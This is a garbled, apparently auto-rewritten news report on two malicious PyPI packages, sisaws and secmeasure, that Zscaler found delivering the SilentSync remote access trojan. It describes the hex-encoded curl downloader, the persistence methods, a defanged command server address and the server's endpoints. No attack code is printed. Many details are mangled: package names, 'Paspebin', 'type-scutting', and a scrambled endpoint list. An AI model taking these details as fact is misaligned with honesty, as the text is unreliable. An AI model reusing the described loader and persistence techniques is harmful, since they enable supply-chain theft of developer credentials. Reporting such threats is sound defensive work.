Cybersecurity researchers have discovered two new malicious packages in the Python Package Index (PYPI) repository that are designed to provide a remote access trojan called SilentsYnc in Windows Systems.
“Silentsync allows you to execute remote commands, remove files, and screen capture,” said Manisha Ramcharan Prajapati and Satyam Singh of Zscaler Threatlabz. “SilentsYnc also extracts web browser data such as credentials, history, autofill data, and cookies from web browsers such as Chrome, Brave, Edge, and Firefox.”
Packages that are no longer available to download from Pypi are listed below. Both were uploaded by a user named “condetgapis”.
sisaws (201 downloads) seconds (627 downloads)
Zscaler said the package Sisaws mimics the behavior of the legitimate Python package SISA related to the Argentina national health information system, Sistema Integrado de Información Anitaria Argentino (SISA).
However, what exists in the library is a function called “gen_token()” from the initialization script (__init__.py) that acts as the next-stage malware downloader. To achieve this, we send a hardcoded token as input and receive a secondary static token as a response in a manner similar to a legitimate SISA API.
“When a developer imports a SISAWS package and calls the GEN_TOKEN function, the code decodes a hex command that reveals the CURL command, which is used to retrieve additional Python scripts.” “The Python script obtained from Paspebin is written to the filename Helper.py in a temporary directory and executed.”
SecMeasure in a similar way pretends to be a “library for cleaning strings and applying security measures”, but has an embedded feature to drop Silentsync rats.
SilentsYnc mainly aims to infect Windows systems at this stage, but the malware also comes with built-in functions for Linux and MacOS, which changes the registry in Windows, changes the Linux Crontab file to run the system startup payload, and registers the MacOS launcher agent.
This package relies on the presence of a secondary token to send an HTTP GET request to a hardcoded endpoint (“200.58.107″[.]25”) For receiving Python code that runs directly in memory. The server supports 4 different endpoints –
To check /checkin, connectivity /comando /comando, run /respuesta command, send status message /archivo, send command output or stolen data
Malware allows you to harvest browser data, run shell commands, capture screenshots, and steal files. You can also remove entire files and directories in the form of a ZIP archive. Once data is sent, all artifacts are removed from the host up to the side step detection effort.
“Discovering Malicious PYPI Packages SISAWS and SecMeasure highlight the increased risk of supply chain attacks within public software repositories,” Zscaler said. “By leveraging type-scutting, impersonating a legitimate package, threat actors can access personally identifiable information (PII).”
Source link
